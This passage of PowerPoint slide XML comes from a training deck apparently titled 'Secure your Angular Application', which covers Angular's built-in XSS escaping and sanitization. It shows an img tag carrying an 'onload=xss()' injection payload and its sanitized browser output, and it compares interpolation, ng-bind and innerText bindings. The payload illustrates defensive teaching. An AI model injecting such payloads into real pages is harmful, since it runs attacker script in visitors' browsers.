                          </a:effectLst>
                        </a:rPr>
                        <a:t>="test.jpg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>" alt="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>``</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>onload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>xss</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>" /&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;!-- Browser Output --&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;IMG alt=``</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>onload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>xss</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>="test.jpg"&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44587" y="1944944"/>
            <a:ext cx="266394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87" y="2574746"/>
            <a:ext cx="2663942" cy="1005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2532" y="3601128"/>
            <a:ext cx="2665997" cy="986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708529" y="987574"/>
            <a:ext cx="7234595" cy="936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721731" y="1944944"/>
            <a:ext cx="7221393"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721731" y="2571749"/>
            <a:ext cx="7221393" cy="10081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736251" y="3579860"/>
            <a:ext cx="7206874" cy="10081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078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P spid="18"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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151199" y="204550"/>
            <a:ext cx="6917395" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Angular Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="500" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="500" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="500" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="500" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Angular escapes and sanitizes natively </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Tableau 11"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305152916"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="107504" y="1347615"/>
          <a:ext cx="8964489" cy="3409628"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1080120"/>
                <a:gridCol w="3999757"/>
                <a:gridCol w="3884612"/>
              </a:tblGrid>
              <a:tr h="562352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="360040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="504057">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Interpolated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> content</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>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1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>{{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>}}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>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fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>{{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>}}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="432047">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Bound</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>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fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;element </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ng-bind</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>"&gt;&lt;/element&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="50"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;element </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>innerText</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>"&gt;&lt;/element&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="584055">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">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fr-FR" sz="1100" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
